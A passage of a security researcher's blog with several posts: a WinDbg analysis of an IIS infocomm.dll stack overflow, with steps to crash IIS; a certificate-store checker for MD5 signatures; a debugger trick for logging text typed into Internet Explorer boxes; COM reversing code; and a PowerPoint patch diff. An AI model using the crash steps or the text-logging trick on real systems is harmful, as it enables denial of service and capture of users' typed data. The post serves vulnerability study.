255);">v24</span><span style="color:navy;">;<br />}</span></span><br /><br /><span style="font-weight: bold;font-size:130%;" >Runtime analysis</span><br /><br />At this point, a little bit of runtime analysis using <a href="http://www.microsoft.com/whdc/devtools/debugging/default.mspx">WinDbg</a> could help us to get the whole picture.<br /><br />Being attached to the <span style="font-size:85%;"><span style="font-family:courier new;">inetinfo.exe</span></span> process (where <span style=";font-family:courier new;font-size:85%;" >infocomm.dll</span> is loaded, according to Sysinternals <a href="http://www.microsoft.com/technet/sysinternals/ProcessesAndThreads/Handle.mspx">handle</a> utility), we set a breakpoint on <span style="font-size:85%;"><span style="font-family:courier new;">FileChanged()</span></span>:<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">0:016> .reload /f</span><br /><span style="font-family:courier new;">Reloading current modules</span> <span style="font-family:courier new;">...</span><span style="font-family:courier new;">...............................................................</span><br /><span style="font-family:courier new;">0:016> bp CVRootDirMonitorEntry::FileChanged</span> <span style="font-family:courier new;"><br />0:016> bl</span><br /><span style="font-family:courier new;">0 e 71ba7ca0 0001 (0001) 0:**** INFOCOMM!CVRootDirMonitorEntry::FileChanged</span><br /><span style="font-family:courier new;">0:016> g</span></span><br /><br />Given the name of the function under scrutiny, we suspect it will be called during file operations inside the Web root:<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">echo "hello" > c:\inetpub\wwwroot\test.txt</span></span><br /><br />It worked! Moreover, we can confirm that the first argument passed to <span style="font-size:85%;"><span style="font-family:courier new;">FileChanged()</span></span>, which is of type <span style="font-size:85%;"><span style="font-family:courier new;">char*</span></span> according to debug symbols, is the filename.<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">Breakpoint 0 hit</span><br /><span style="font-family:courier new;">eax=00000000 ebx=00000008 ecx=00712430 edx=007238c4 esi=007238a8<br />edi=007238a8</span><span style="font-family:courier new;"> eip=71ba7ca0 esp=009cfed8 ebp=009cff0c<br />iopl=0 nv up ei pl zr na pe nc</span><br /><span style="font-family:courier new;">cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246</span> <span style="font-family:courier new;">INFOCOMM!CVRootDirMonitorEntry::FileChanged:</span><br /><span style="font-family:courier new;">71ba7ca0 8bff mov edi,edi<br /></span><span style="font-family:courier new;"><br />0:004> da poi(esp+4)</span><br /><span style="font-family:courier new;">009cfee4 "test.txt"</span></span><br /><br /><span style="font-size:130%;"><span style="font-weight: bold;">Summary of our findings</span></span><br /><br />Not everything makes sense for now, but we have gathered much interesting information during this preliminary analysis phase:<br /><ul><li><span style="font-size:85%;"><span style="font-family:courier new;">CVRootDirMonitorEntry::FileChanged()</span></span> does (possibly insecure) string manipulation.<br /></li><li>This function is called whenever a file under the Web root is "touched". The filename is passed as the first argument.<br /></li><li>The offending code will be reached only if the filename contains the "~" character, <span style="font-style: italic;">and</span> the "\" character (thus being inside a subdirectory).</li><li><span style=";font-family:courier new;font-size:85%;" >ConvertToLongFileName()</span> will be called in between on the filename.<br /></li></ul><span style="font-weight: bold;font-size:130%;" >A bug, really ?<br /></span><br />At this point, we need to have a closer look at <span style=";font-family:courier new;font-size:85%;" >ConvertToLongFileName()</span> internals.<br /><br />According to debug symbols, the function prototype is:<br /><span style="font-size:85%;"><span style="font-family:courier new;">int __stdcall ConvertToLongFileName(char *, LPCSTR lpString2, LPWIN32_FIND_DATAA lpFindFileData)</span></span><br /><br />Implementation of this function is trivial: it takes the filename as an argument and uses <span style=";font-family:courier new;font-size:85%;" >FindFirstFileA() </span>on it. The corresponding <span style="font-size:85%;"><span style="font-family:courier new;">WIN32_FIND_DATA</span></span> structure is passed back to the caller for future use.<br /><br /><a href="http://msdn.microsoft.com/en-us/library/aa364418%28VS.85%29.aspx">MSDN documentation</a> relative to <span style="font-size:85%;"><span style="font-family:courier new;">FindFirstFile()</span></span> is pretty straightforward. The <a href="http://msdn.microsoft.com/en-us/library/aa365740%28VS.85%29.aspx">WIN32_FIND_DATA</a> structure is more interesting:<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">typedef struct _WIN32_FIND_DATA {</span><br /><span style="font-family:courier new;">DWORD dwFileAttributes;</span><br /><span style="font-family:courier new;">FILETIME ftCreationTime;</span><br /><span style="font-family:courier new;">FILETIME ftLastAccessTime;</span><br /><span style="font-family:courier new;">FILETIME ftLastWriteTime;</span><br /><span style="font-family:courier new;">DWORD nFileSizeHigh;</span><br /><span style="font-family:courier new;">DWORD nFileSizeLow;</span><br /><span style="font-family:courier new;">DWORD dwReserved0;</span><br /><span style="font-family:courier new;">DWORD dwReserved1;</span><br /><span style="font-family:courier new;">TCHAR cFileName[MAX_PATH];</span><br /><span style="font-family:courier new;">TCHAR cAlternateFileName[14];</span><br /><span style="font-family:courier new;">}<br />WIN32_FIND_DATA,</span> <span style="font-family:courier new;">*PWIN32_FIND_DATA,</span> <span style="font-family:courier new;">*LPWIN32_FIND_DATA;</span></span><br /><span style="font-size:85%;"></span><span style="font-size:100%;"><br />The caller will copy </span><span style="font-size:100%;"><span style=";font-family:courier new;font-size:85%;" >FindFileDate.cFileName</span> into a fixed size buffer of 264 bytes. Since </span><span style="font-size:100%;"><span style=";font-family:courier new;font-size:85%;" >MAX_PATH</span> has a value of 260 on Windows platform, this is probably </span><span style="font-size:100%;"><span style="font-family:courier new;"><span style="font-size:85%;">MAX_PATH+1</span></span> aligned to a DWORD. Where is the trick ?</span><br /><br /><span style="font-weight: bold;font-size:130%;" >Where Unicode comes into play<br /></span><br />The trick is called Unicode. Quoting <a href="http://msdn.microsoft.com/en-us/library/aa365247.aspx">MSDN documentation</a>:<br /><blockquote style="font-style: italic;">In the Windows API (with some exceptions discussed in the following paragraphs), the maximum length for a path is MAX_PATH, which is defined as 260 characters.<br />(...)<br />The Windows API has many functions that also have Unicode versions to permit an extended-length path for a maximum total path length of 32,767 characters.</blockquote>What about <a href="http://msdn.microsoft.com/en-us/library/aa363858%28VS.85%29.aspx">CreateFile</a> ?<br /><blockquote style="font-style: italic;">The Unicode versions of several functions permit a maximum path length of approximately 32,000 characters composed of components up to 255 characters in length.</blockquote>Therefore, it is possible to build a very long Unicode path, as long as each path token is less than 255 characters long. There is a little quirk in <span style="font-size:85%;"><span style="font-family:courier new;">FindFirstFile()</span></span> documentation here: <span style="font-size:85%;"><span style="font-family:courier new;">cFileName</span><span style="font-family: courier new;"></span></span> cannot be longer than <span style="font-size:85%;"><span style="font-family: courier new;">MAX_PATH</span></span>, <span style="font-style: italic;">but</span> the full path to this file can go far beyond <span style="font-size:85%;"><span style="font-family: courier new;"></span><span style="font-family:courier new;">MAX_PATH.</span></span><br /><br /><span style="font-weight: bold;font-size:130%;" >Do it yourself</span><br /><br />Here are the steps to trigger the bug:<br /><ul><li>Using the <span style=";font-family:courier new;font-size:85%;" >mkdir</span><span style="font-family:courier new;"></span> command, create a directory inside <span style="font-size:85%;"><span style="font-family:courier new;">C:\Inetpub\wwwroot</span></span> with a long name (200 times 'A', for instance).<br /></li><li>Using <span style=";font-family:courier new;font-size:85%;" >CreateFile("\\?\C:\Inetpub\wwwroot\AAA...AAA\BBB...BBB")</span>, create inside this directory a file with a long name (200 times 'B', for instance). This API call must be Unicode-style, because the resulting full path will be longer than <span style="font-size:85%;"><span style="font-family:courier new;">MAX_PATH</span></span>.<br /></li><li>Now access this file using its short name, as reported by the <span style="font-size:85%;"><span style="font-family:courier new;">dir /x</span></span> command. In this example, this would be something like <span style="font-size:85%;"><span style="font-family:courier new;">echo toto > bbbbbb~1</span></span>.<br /></li></ul>Et voilà ! IIS should crash, because it expanded "aaa...aaa\bbbbbb~1" into "aaa...aaa" and "bbb...bbb" strings, that are thereafter concatenated into a stack-based buffer of size <span style="font-size:85%;"><span style="font-family:courier new;">MAX_PATH</span></span>.<br /><br />Since <span style="font-size:85%;"><span style="font-family:courier new;">infocomm.dll</span></span> has been compiled with <span style="font-size:85%;"><span style="font-family:courier new;">/GS</span></span> option, a stack cookie prevents direct exploitation of this bug. Exploitation on IIS 5 is left as an exercise to the reader ;)<br /><br /><span style="font-weight: bold;font-size:130%;" >Conclusion</span><br /><br />That was a very nice bug to study (even if it ended up in a trivial stack overflow) because it requires good knowledge of Windows internals.<br /><br />As usual, it would be nice to know "how" this bug has been found by the original author. However, using Unicode filenames breaks so many applications out there that it could have been found by accident ;)<br /><br />PS. Happy New Year to all readers !newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com0tag:blogger.com,1999:blog-26480225.post-14869124742081629592009-01-01T23:30:00.001+01:002009-01-01T23:31:04.719+01:00Having fun with certificatesUnless you went on vacation without WiFi access, your iPhone and your BlackBerry, you certainly have heard of the latest "Internet is dead" issue.<br /><br />All details are available <a href="http://www.win.tue.nl/hashclash/rogue-ca/">here</a> and <a href="http://www.phreedom.org/research/rogue-ca/">there</a>. A comprehensive analysis is available on <a href="http://broadcast.oreilly.com/2008/12/the-sky-is-not-falling-on-toda.html">O'Reilly</a> blog. A summary is available on <a href="http://isc.sans.org/diary.html?storyid=5590">ISC</a> blog.<br /><br />Now this is where C# beauty comes into play. Here is a code snippet that will check from local certificate store(s) the signature algorithm used. Everything that is <span style="font-style: italic;">not</span> <span style="font-size:85%;"><span style="font-family: courier new;">sha1RSA</span></span> is displayed, because it should be <span style="font-style: italic;">bad</span> (according to <a href="http://blogs.technet.com/swi/archive/2008/12/30/information-regarding-md5-collisions-problem.aspx">Microsoft analysis</a>).<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">using System;</span><br /><span style="font-family: courier new;">using System.Security.Cryptography.X509Certificates;</span><br /><br /><span style="font-family: courier new;">namespace SearchCerts</span><br /><span style="font-family: courier new;">{</span><br /><span style="font-family: courier new;"> class Program</span><br /><span style="font-family: courier new;"> {</span><br /><span style="font-family: courier new;"> static void Main(string[] args)</span><br /><span style="font-family: courier new;"> {</span><br /><span style="font-family: courier new;"> // *** select appropriate store below ***</span><br /><span style="font-family: courier new;"> //var store = new X509Store(StoreName.My);</span><br /><span style="font-family: courier new;"> //var store = new X509Store(StoreName.AuthRoot);</span><br /><span style="font-family: courier new;"> //var store = new X509Store(StoreName.CertificateAuthority);</span><br /><span style="font-family: courier new;"> //var store = new X509Store(StoreName.Root);</span><br /><span style="font-family: courier new;"> //var store = new X509Store(StoreName.TrustedPeople);</span><br /><span style="font-family: courier new;"> //var store = new X509Store(StoreName.TrustedPublisher);</span><br /><br /><span style="font-family: courier new;"> store.Open(OpenFlags.OpenExistingOnly | OpenFlags.ReadOnly);</span><br /><span style="font-family: courier new;"> foreach (var cert in store.Certificates)</span><br /><span style="font-family: courier new;"> {</span><br /><span style="font-family: courier new;"> if (cert.SignatureAlgorithm.FriendlyName != "sha1RSA")</span><br /><span style="font-family: courier new;"> {</span><br /><span style="font-family: courier new;"> System.Console.WriteLine("------------------------------");</span><br /><span style="font-family: courier new;"> System.Console.WriteLine("[FriendlyName]\t" + cert.FriendlyName);</span><br /><span style="font-family: courier new;"> System.Console.WriteLine("[Issuer]\t" + cert.Issuer);</span><br /><span style="font-family: courier new;"> System.Console.WriteLine("[Subject]\t" + cert.Subject);</span><br /><span style="font-family: courier new;"> System.Console.WriteLine("[Signature]\t" + cert.SignatureAlgorithm.FriendlyName);</span><br /><span style="font-family: courier new;"> }</span><br /><span style="font-family: courier new;"> }</span><br /><span style="font-family: courier new;"> store.Close();</span><br /><span style="font-family: courier new;"> System.Console.WriteLine("finished");</span><br /><span style="font-family: courier new;"> System.Console.ReadLine();</span><br /><span style="font-family: courier new;"> }</span><br /><span style="font-family: courier new;"> }</span><br /><span style="font-family: courier new;">}</span></span><br /><br />Here are some results from <span style="font-style: italic;">my</span> certificate stores. Your mileage may vary.<br /><br /><a href="http://freephonie.org/portal.php">Freephonie</a> PKI is using MD5. End-users cannot submit <a href="http://en.wikipedia.org/wiki/Certificate_signing_request">CSR</a>s by themselves, so the risk remains low. I'd be glad to know if the Freebox itself can send CSRs.<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">[FriendlyName]</span><br /><span style="font-family: courier new;">[Issuer] O=Free, L=Paris, S=France, C=FR</span><br /><span style="font-family: courier new;">[Subject] CN=1234567, O=Free, L=Paris, S=France, C=FR</span><br /><span style="font-family: courier new;">[Signature] md5RSA</span></span><br /><br /><a href="http://igc.services.cnrs.fr/CNRS-Standard/">CNRS-Standard</a> and <a href="http://igc.services.cnrs.fr/CNRS-Plus/">CNRS-Plus</a> PKI are using MD5. This is more concerning, because those are widely used authorities, and users can request certificates "at will".<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">[FriendlyName]</span><br /><span style="font-family: courier new;">[Issuer] CN=CNRS, O=CNRS, C=FR</span><br /><span style="font-family: courier new;">[Subject] CN=CNRS-Plus, O=CNRS, C=FR</span><br /><span style="font-family: courier new;">[Signature] md5RSA</span><br /><br /><span style="font-family: courier new;">[FriendlyName]</span><br /><span style="font-family: courier new;">[Issuer] CN=CNRS, O=CNRS, C=FR</span><br /><span style="font-family: courier new;">[Subject] CN=CNRS-Standard, O=CNRS, C=FR</span><br /><span style="font-family: courier new;">[Signature] md5RSA</span></span><br /><br /><a href="http://www.microsoft.com/whdc/winlogo/drvsign/drvsign.mspx">Microsoft</a> drivers signing PKI (at least on Windows XP SP2). Since drivers developers can ask for signatures, this is concerning too. But I feel that this authority might not be used by Microsoft anymore for newer signatures, given its old age.<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">[FriendlyName]</span><br /><span style="font-family: courier new;">[Issuer] CN=Microsoft Root Authority, OU=Microsoft Corporation, OU=Copyri</span><span style="font-family: courier new;">ght (c) 1997 Microsoft Corp.</span><br /><span style="font-family: courier new;">[Subject] CN=Microsoft Windows Hardware Compatibility, OU=Microsoft Corpor</span><span style="font-family: courier new;">ation, OU=Microsoft Windows Hardware Compatibility Intermediate CA, OU=Copyright</span><span style="font-family: courier new;"> (c) 1997 Microsoft Corp.</span><br /><span style="font-family: courier new;">[Signature] md5RSA</span></span><br /><br />Some random <a href="https://www.netlock.net/">foreign authorities</a>, which are using obscure certification policies.<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">[FriendlyName] NetLock Uzleti (Class B) Tanusitvanykiado</span><br /><span style="font-family: courier new;">[Issuer] CN=NetLock Uzleti (Class B) Tanusitvanykiado, OU=Tanusitvanykiad</span><span style="font-family: courier new;">ok, O=NetLock Halozatbiztonsagi Kft., L=Budapest, C=HU</span><br /><span style="font-family: courier new;">[Subject] CN=NetLock Uzleti (Class B) Tanusitvanykiado, OU=Tanusitvanykiad</span><span style="font-family: courier new;">ok, O=NetLock Halozatbiztonsagi Kft., L=Budapest, C=HU</span><br /><span style="font-family: courier new;">[Signature] md5RSA</span></span><br /><br />And last but not least, this VeriSign authority is using ... MD2 (this is not the only one, unfortunately).<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">[FriendlyName] VeriSign</span><br /><span style="font-family: courier new;">[Issuer] OU=VeriSign Commercial Software Publishers CA, O="VeriSign, Inc.</span><span style="font-family: courier new;">", L=Internet</span><br /><span style="font-family: courier new;">[Subject] OU=VeriSign Commercial Software Publishers CA, O="VeriSign, Inc.</span><span style="font-family: courier new;">", L=Internet</span><br /><span style="font-family: courier new;">[Signature] md2RSA</span></span><br /><br />PS. <a href="http://www.impots.gouv.fr/">impots.gouv.fr</a> is NOT vulnerable ;)newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com2tag:blogger.com,1999:blog-26480225.post-47077851810795470042008-12-19T18:48:00.001+01:002008-12-19T18:49:17.136+01:00Pentester trick #6: logging Internet Explorer boxesIn a previous post (<a href="http://newsoft-tech.blogspot.com/2008/08/pentester-trick-5-debugging-without.html"><span class="Apple-style-span" style="font-style: italic;">Debugging Without Debugger</span></a>), I promised to explain how to log content from text areas within <span style="font-weight: bold;">Internet Explorer</span> Web pages.<div><br /></div><div>If you tried to apply the previously described technique to Internet Explorer, you should have noticed that <span style=";font-family:courier new;font-size:85%;" >GetWindowText</span> is never called for getting text from Web controls. This is because the whole Web page is rendered without relying on standard Windows controls.</div><div><br /></div><div>Therefore, we need to find the <span style="font-size:85%;">GetWindowTextLength/GetWindowText</span> equivalents in <span style="font-size:85%;"><span style="font-family: courier new;">MSHTML.DLL</span></span>. Fortunately, debugging symbols will help us much in this case. The equivalent functions are:</div><div><br /></div><div><div style="font-family: courier new;"><span style="font-size:85%;">mshtml!CTxtPtr::GetPlainTextLength()<br /></span></div><div style="font-family: courier new;"><span style="font-size:85%;">mshtml!CTxtPtr::GetPlainText()</span></div><div><br /></div><div>Which are called from 3 locations, the most common being:<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">mshtml!CElement::GetPlainTextInScope()</span></span></div><div><br />Unfortunately, NTSD does not seem to handle symbols properly, which prevents us from setting a symbolic breakpoint :(<br /><br />Since <span style="font-size:85%;"><span style="font-family: courier new;">MSHTML.DLL</span></span> is upgraded by virtually every cumulative patch for Internet Explorer, you really need to get access to the debugging symbols for the specific Internet Explorer version installed on the target (hint: use the SYMCHK utility shipped with <a href="http://www.microsoft.com/whdc/devtools/debugging/default.mspx">Debugging Tools</a>) and find appropriate addresses inside.<br /><br />From my up-to-date Internet Explorer 7 installation, here are some sample addresses:<br /><br /><div style="font-family: courier new;"><span style="font-size:85%;">mshtml!CTxtPtr::GetPlainTextLength : 0x44BB3B85 (entry point) -> 0x44BB3BFD (ret)<br /></span></div><div style="font-family: courier new;"><span style="font-size:85%;">mshtml!CTxtPtr::GetPlainText : 0x44BB3C05 (entry point) -> 0x44BB3C75 (ret)<br /></span></div><span style="font-family: courier new;font-size:85%;" >mshtml!CElement::GetPlainTextInScope : </span><span style="font-size:85%;"><span style="font-family: courier new;">0x44BB3CA6 (entry point) -> 0x44BB3D46 (ret)</span></span><br /><br />The epilog of <span style="font-size:85%;"><span style="font-family: courier new;">GetPlainTextInScope</span></span> function is:<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">.text:44BB3D3F mov eax, [ebp+var_4]</span><br /><span style="font-family: courier new;">.text:44BB3D42 pop edi</span><br /><span style="font-family: courier new;">.text:44BB3D43 pop esi</span><br /><span style="font-family: courier new;">.text:44BB3D44 pop ebx</span><br /><span style="font-family: courier new;">.text:44BB3D45 leave</span><br /><span style="font-family: courier new;">.text:44BB3D46 retn 4</span><br /><span style="font-family: courier new;">.text:44BB3D46 ?GetPlainTextInScope@CElement@@QAEJPAVCStr@@@Z endp</span></span><br /><br />From here, it is nice to know that ESI points to the Unicode text content before being overwritten at address <span style="font-size:85%;"><span style="font-family: courier new;">0x</span><span style="font-family: courier new;"><span style="font-family: courier new;">44BB3D43</span>.</span></span> Therefore the following NTSD commands will do the trick:</div><div><br /></div><div><span style="font-size:85%;"><span style="font-family: courier new;">ntsd -pn iexplore.exe</span><br /><span style="font-family: courier new;">bp 0x44BB3D43 "du poi(esi); g;"</span><br /></span><br /></div><div>Awkward trick I must admit, but it could save pentesters' lifes anyway ;)<br /></div></div>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com0tag:blogger.com,1999:blog-26480225.post-82250980193177769962008-08-23T21:31:00.003+01:002008-08-23T21:57:11.653+01:00Reversing COM componentsThere are many free tools available that could prove helpful for analyzing COM components. My favorites are <a href="http://labs.idefense.com/software/fuzzing.php#more_comraider">COMRaider</a> and Jose Roca's <a href="http://www.com.it-berater.org/typelib_browser.htm">TypeLib Browser</a>.<br /><br />Those tools are good for a 1st pass analysis (like fuzzing or calling a specific method from a VBS script), but when it comes to have a look at the binary implementation itself, things become a little thougher...<br /><br />There are some IDA Pro helpers (scripts and plugins) hanging around, but given the complexity of COM and C++ reversing, it remains quite hard to tell where the code is through static analysis only.<br /><br />Then I stumbled upon <a href="http://securitylabs.websense.com/content/Blogs/3166.aspx">this post</a> (by WebSense) that gives a very easy way to locate all exported methods through the use of <a href="http://msdn.microsoft.com/en-us/library/8etzzkb6%28VS.71%29.aspx">#import</a> directive in Visual Studio. Since they only give away screenshots, here is the full piece of code that will retrieve the RVA of the first 10 methods of Flash plugin.<br /><br /><span style="font-size:78%;"><span style="font-family:courier new;">#include <windows.h></span><br /><span style="font-family:courier new;">#include <stdio.h></span><br /><br /><span style="font-family:courier new;">// Note: this must be a CPP file to use #import directive</span><br /><span style="font-family:courier new;">#import "C:\\WINDOWS\\SYSTEM32\\Macromed\\Flash\\Flash9e.ocx" no_namespace</span><br /><br /><span style="font-family:courier new;">int main() {</span><br /><br /><span style="font-family:courier new;"> printf("Hello, world of COM!\n");</span><br /><span style="font-family:courier new;"> </span><br /><span style="font-family:courier new;"> CoInitialize(NULL);</span><br /><span style="font-family:courier new;"> </span><br /><span style="font-family:courier new;"> IShockwaveFlash *pShockwave=NULL;</span><br /><span style="font-family:courier new;"> </span><br /><span style="font-family:courier new;"> HRESULT hr = CoCreateInstance( __uuidof(ShockwaveFlash),</span><br /><span style="font-family:courier new;"> NULL,</span><br /><span style="font-family:courier new;"> CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER,</span><br /><span style="font-family:courier new;"> __uuidof(IShockwaveFlash),</span><br /><span style="font-family:courier new;"> (void**)&pShockwave</span><br /><span style="font-family:courier new;"> );</span><br /><span style="font-family:courier new;"> </span><br /><span style="font-family:courier new;"> if (hr==S_OK) {</span><br /><span style="font-family:courier new;"> </span><br /><span style="font-family:courier new;"> DWORD dwVT=*(DWORD*)pShockwave;</span><br /><span style="font-family:courier new;"> DWORD *p=(DWORD*)dwVT;</span><br /><span style="font-family:courier new;"> </span><br /><span style="font-family:courier new;"> for (int i=1;i<11;i++) {<br /><span style="font-family:courier new;"> printf("[%d] VA=%08x RVA=%08x\n",</span><br /><span style="font-family:courier new;"> i,</span><br /><span style="font-family:courier new;"> *p,</span><br /><span style="font-family:courier new;"> *p-(DWORD)GetModuleHandle("Flash9e.ocx")</span><br /><span style="font-family:courier new;"> );</span><br /><span style="font-family:courier new;"> </span><br /><span style="font-family:courier new;"> p++;</span><br /><span style="font-family:courier new;"> }</span><br /><span style="font-family:courier new;"> </span><br /><span style="font-family:courier new;"> pShockwave->Release();</span><br /><span style="font-family:courier new;"> }</span><br /><br /><span style="font-family:courier new;"> return 0;</span><br /><span style="font-family:courier new;">}</span><br /></span></span><br /><br />Sample output:<br /><br /><span style="font-size:85%;"><span style=";font-family:courier new;font-size:78%;" >C:\>cl test.cpp</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 14.00.50727.762 for 80x86</span><span style="font-size:78%;"><br /><br /></span><span style=";font-family:courier new;font-size:78%;" >Copyright (C) Microsoft Corporation. All rights reserved.</span><span style="font-size:78%;"><br /><br /></span><span style=";font-family:courier new;font-size:78%;" >test.cpp</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >Microsoft (R) Incremental Linker Version 8.00.50727.762</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >Copyright (C) Microsoft Corporation. All rights reserved.</span><span style="font-size:78%;"><br /><br /></span><span style=";font-family:courier new;font-size:78%;" >/out:test.exe</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >test.obj</span><span style="font-size:78%;"><br /><br /></span><span style=";font-family:courier new;font-size:78%;" >C:\>test.exe</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >Hello, world of COM!</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[1] VA=300b4ec2 RVA=000b4ec2</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[2] VA=300b38a4 RVA=000b38a4</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[3] VA=300b38b1 RVA=000b38b1</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[4] VA=300bd353 RVA=000bd353</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[5] VA=300b78b7 RVA=000b78b7</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[6] VA=300b7d33 RVA=000b7d33</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[7] VA=300cbe5c RVA=000cbe5c</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[8] VA=300c7c34 RVA=000c7c34</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[9] VA=300c7c46 RVA=000c7c46</span><span style="font-size:78%;"><br /></span><span style=";font-family:courier new;font-size:78%;" >[10] VA=300c7b9d RVA=000c7b9d</span><br /></span><br />Beware: the COM component will be instanciated by this code. Do not try this on malicious code, unless you know what you are doing!newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com3tag:blogger.com,1999:blog-26480225.post-66232146098533998262008-08-18T20:05:00.003+01:002008-08-18T20:41:13.242+01:00MS08-051 secretsOn <a href="http://www.microsoft.com/technet/security/Bulletin/ms08-Aug.mspx">August 12th</a>, Microsoft released a flurry of Office security patches.<br /><br />Among those patches is to be found <a href="http://www.microsoft.com/technet/security/Bulletin/MS08-051.mspx">MS08-051</a> / <a href="http://support.microsoft.com/kb/949785">Q949785</a>, a patch targeting all supported versions of PowerPoint and PowerPoint Viewer, excluding PowerPoint Viewer 2007 and PowerPoint 2008 for Mac.<br /><br />According to the bulletin, this patch fixes at least 3 vulnerabilities, 2 of them being documented on <a href="http://reversemode.com/index.php?option=com_content&task=view&id=53&Itemid=1">Reversemode.com</a>. Let's have a look at the first vulnerability, which is an integer overflow resulting in a heap overflow. At the time of writing, a vulnerable version (11.0.5703.0) of <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=428D5727-43AB-4F24-90B7-A94784AF71A4&displaylang=en">PowerPoint Viewer 2003</a> can be downloaded from Microsoft web site. The vulnerable code path can be found in this version:<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">.text:300F642C loc_300F642C:</span><br /><span style="font-family: courier new;">.text:300F642C mov eax, [edi]</span><br /><span style="font-family: courier new;">.text:300F642E mov ecx, [ebp+var_14]</span><br /><span style="font-family: courier new;">.text:300F6431 mov ebx, [eax+ecx*4]</span><br /><span style="font-family: courier new;">.text:300F6434 mov esi, [ebx+2] <span style="font-weight: bold; color: rgb(255, 0, 0);">; EBX is user-supplied length</span></span><br /><span style="font-family: courier new;">.text:300F6437 test esi, esi</span><br /><span style="font-family: courier new;">.text:300F6439 mov [ebp+var_20], ebx</span><br /><span style="font-family: courier new;">.text:300F643C mov [ebp+var_1C], esi</span><br /><span style="font-family: courier new;">.text:300F643F jz loc_300F6516</span><br /><span style="font-family: courier new;">.text:300F6445 mov ax, [ebx]</span><br /><span style="font-family: courier new;">.text:300F6448 and eax, 3FFFh</span><br /><span style="font-family: courier new;">.text:300F644D push eax</span><br /><span style="font-family: courier new;">.text:300F644E call _MsoPopinfoGet@4 ; MsoPopinfoGet(x)</span><br /></span><br />If EBX==0xFFFFFFFF, this code will result in calling GlobalAlloc(0x00000001) and copying 0xFFFFFFFF bytes later on.<br /><br />After patching PowerPoint Viewer 2003, the code looks like (thanks to <a href="http://cgi.tenablesecurity.com/tenable/patchdiff.php">PatchDiff</a> ;):<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">.text:300DC0BC loc_300DC0BC:</span><br /><span style="font-family: courier new;">.text:300DC0BC mov eax, [edi]</span><br /><span style="font-family: courier new;">.text:300DC0BE mov ecx, [ebp+var_14]</span><br /><span style="font-family: courier new;">.text:300DC0C1 mov ebx, [eax+ecx*4]</span><br /><span style="font-family: courier new;">.text:300DC0C4 mov esi, [ebx+2]</span><br /><span style="font-family: courier new;">.text:300DC0C7 test esi, esi</span><br /><span style="font-family: courier new;">.text:300DC0C9 mov [ebp+var_24], ebx</span><br /><span style="font-family: courier new;">.text:300DC0CC mov [ebp+var_20], esi</span><br /><span style="font-family: courier new;">.text:300DC0CF jz loc_300DC1B2</span><br /><span style="font-family: courier new; font-weight: bold; color: rgb(255, 0, 0);">.text:300DC0D5 cmp [ebp+var_18], esi</span><br /><span style="font-family: courier new; font-weight: bold; color: rgb(255, 0, 0);">.text:300DC0D8 jb loc_300DC1DD</span><br /><span style="font-family: courier new;">.text:300DC0DE mov ax, [ebx]</span><br /><span style="font-family: courier new;">.text:300DC0E1 sub [ebp+var_18], esi</span><br /><span style="font-family: courier new;">.text:300DC0E4 and eax, 3FFFh</span><br /><span style="font-family: courier new;">.text:300DC0E9 push eax</span><br /><span style="font-family: courier new;">.text:300DC0EA call _MsoPopinfoGet@4 ; MsoPopinfoGet(x)</span></span><br /><br />End of the story ? Not quite ... There is at least another Microsoft product that shares the PowerPoint codebase: <a href="http://office.microsoft.com/en-us/help/HA101733831033.aspx">Microsoft Office Live Meeting Client 2007</a>.<br /><br />Since it has PowerPoint rendering capabilities, this client is bundled with "lmpptview.dll". Beta versions of this DLL are internally numbered "12.0.x", showing clear connection with Office 2007. As of RTM version, this DLL is now numbered "8.0.3029.0". However, the following code sequence can be found inside:<br /><br /><span style="font-size:85%;"><span style="font-family: courier new;">.text:004345FC loc_4345FC:</span><br /><span style="font-family: courier new;">.text:004345FC mov ecx, [ecx]</span><br /><span style="font-family: courier new;">.text:004345FE lea eax, [ecx+edx*4]</span><br /><span style="font-family: courier new;">.text:00434601 mov edi, [eax]</span><br /><span style="font-family: courier new;">.text:00434603 mov esi, [edi+2]</span><br /><span style="font-family: courier new;">.text:00434606 test esi, esi</span><br /><span style="font-family: courier new;">.text:00434608 jz short loc_434689</span><br /><span style="font-family: courier new; font-weight: bold; color: rgb(255, 0, 0);">.text:0043460A cmp [ebp-14h], esi</span><br /><span style="font-family: courier new; font-weight: bold; color: rgb(255, 0, 